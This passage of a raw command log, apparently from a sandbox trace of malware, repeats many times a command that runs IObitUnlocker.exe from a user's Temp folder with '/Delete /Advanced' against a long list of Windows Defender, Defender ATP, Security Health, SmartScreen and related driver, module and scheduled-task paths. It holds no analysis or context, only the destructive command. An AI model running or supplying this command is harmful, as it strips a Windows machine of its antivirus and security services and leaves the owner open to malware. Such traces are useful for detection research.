Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

